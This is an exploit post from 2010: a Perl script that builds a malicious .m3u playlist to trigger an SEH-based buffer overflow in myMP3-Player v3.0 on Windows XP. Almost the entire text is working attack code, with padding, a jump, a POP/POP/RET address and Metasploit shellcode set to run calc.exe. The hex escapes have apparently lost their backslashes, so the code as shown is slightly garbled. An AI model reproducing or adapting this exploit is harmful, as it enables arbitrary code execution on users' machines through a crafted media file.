myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
Posted on 18 March 2010
============================================================ myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH) ============================================================ #!/usr/bin/perl # Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH) # Date: 18.03.2010 # Author: n3w7u # Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html # Version: 3.0 and the other version can't be download from serious Page, and don't be free. # Tested on: Windows XP SP3 (ger) #[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ] my $file= "evil.m3u"; my $junk ="x41" x 1040; # for myMp3 Player 5/cracked junk =1056 my $jmp="xEBx08x90x90"; # jmp short my $seh="x25x12xC8x72"; #72 C8 12 25 msacm32.drv my $nop ="x90" x 20; my $nops ="x90" x 10; # windows/exec - 224 bytes # http://www.metasploit.com # Encoder: x86/call4_dword_xor # EXITFUNC=process, CMD=calc.exe my $buf = "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" . "x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" . "xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" . "xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" . "x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" . "x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" . "x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd" . "x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f" . "x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a" . "x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" . "xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35" . "x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" . "xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" . "x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" . "x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" . "x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce"; open($File,">$file"); print $File $junk.$jmp.$seh.$nop.$buf.$nops; close($File); # ~ - [ [ : Inj3ct0r : ] ]
